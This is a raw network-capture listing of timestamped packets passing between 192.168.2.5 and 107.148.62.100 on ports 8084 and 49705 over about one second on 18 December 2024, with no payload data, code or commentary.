Dec 18, 2024 13:32:03.778480053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.778497934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.778512955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.778542995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.782780886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.782798052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.782810926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.782826900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.782850027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.784008980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.784735918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.784751892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.784766912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.784776926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.784810066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.785969973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.785986900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.786001921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.786029100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.787265062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.787281990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.787297010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.787309885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.787338972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.788805962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.788822889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.788877010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.848774910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.849273920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.849339962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.849766016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.850096941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.850143909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.850948095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.851543903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.851591110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.855921030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.856398106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.856442928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.856981039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.872526884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.872596025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.873016119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.873667002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.873713970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.888572931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.889482975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.889553070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.889945030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.944284916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.959623098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.959642887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.959659100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.959789991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.961757898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.961785078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.961828947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.962024927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.962042093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.962066889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.964205980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.964226961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.964241982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.964257956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.964289904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.964814901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.964983940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.965024948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.966605902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.966624022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.966638088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.966669083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.967894077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.967911005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.967926025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.967937946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.968060017 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.969557047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.969573021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.969619036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.971421957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.971438885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.971453905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.971483946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.972760916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.972778082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.972793102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.972810030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.972840071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.974590063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.974607944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.974623919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.974668980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.976083994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.976100922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.976142883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.976665020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.976711988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.976758957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.978415966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.978434086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.978451014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.978461027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.978527069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.979837894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.979875088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.979916096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.980652094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.980685949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.980727911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.061929941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.062213898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.062300920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.062828064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.063350916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.063400030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.064291000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.064922094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.064980984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.076773882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.078720093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.078773022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.078799009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.090920925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.091022015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.091428995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.092113972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.092170000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.106710911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.107053995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.107111931 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.107702971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.148335934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.166448116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.166910887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.166975975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.167594910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.167771101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.167821884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.168550014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.169277906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.169331074 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.170151949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.170654058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.170706987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.170816898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.171458006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.171504974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.171988010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.172023058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.172059059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.172070026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.172173023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.172223091 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.172472000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.173259020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.173310995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.174187899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.174817085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.174861908 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.175580025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.177258968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.177323103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.177452087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.178181887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.178236008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.179728985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.179971933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.180022001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.182729959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.186589956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.186647892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.188093901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.188128948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.188174963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.191191912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.192692041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.192725897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.192742109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.192759991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.192806005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.194344997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.194380045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.194412947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.194433928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.195615053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.195648909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.195666075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.197566986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.197602034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.197628021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.197634935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.197683096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.275331020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.275753975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.275825977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.276513100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.276927948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.276997089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.277415991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.277906895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.277955055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.279707909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.279809952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.279859066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.282780886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.283107042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.283159971 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.283238888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.305457115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.305490971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.305521965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.305525064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.305571079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.332921028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.334355116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.334420919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.336086035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.380481958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.380517960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.380548000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.381993055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.382030010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.382050991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.382061005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.382102966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.383611917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.383646965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.383677959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.383696079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.385056973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.385092020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.385107040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.385169983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.385210991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.386682987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.386717081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.386766911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.387037992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.387749910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.387798071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.388541937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.388803959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.388858080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.389425993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.389440060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.389453888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.389480114 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.390533924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.390589952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.391078949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.391726017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.391771078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.393919945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.393934011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.393992901 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.394139051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.394449949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.394498110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.395163059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.397124052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.397176027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.397501945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.398412943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.398457050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.399769068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.400281906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.400324106 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.401005983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.402390957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.402441978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.402542114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.403254032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.403302908 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.405030966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.405380011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.405431032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.406213045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.411027908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.411082983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.411358118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.412240028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.412287951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.492958069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.492974043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.493036985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.494313002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.495913029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.495935917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.495968103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.497464895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.497515917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.508162975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.509680986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.509736061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.511224031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.542401075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.542548895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.543638945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.545170069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.545275927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.546523094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.548037052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.548053980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.548082113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.591594934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.591651917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.592336893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.592947006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.593014956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.593215942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.593962908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.594006062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.594047070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.595083952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.595134020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.595617056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.596215963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.596271038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.597747087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.597965956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.598022938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.598521948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.599881887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.599931002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.600178003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.601012945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.601063967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.602313995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.602593899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.602644920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.603697062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.607331991 CET	8084	49705	107.148.62.100	192.168.2.5
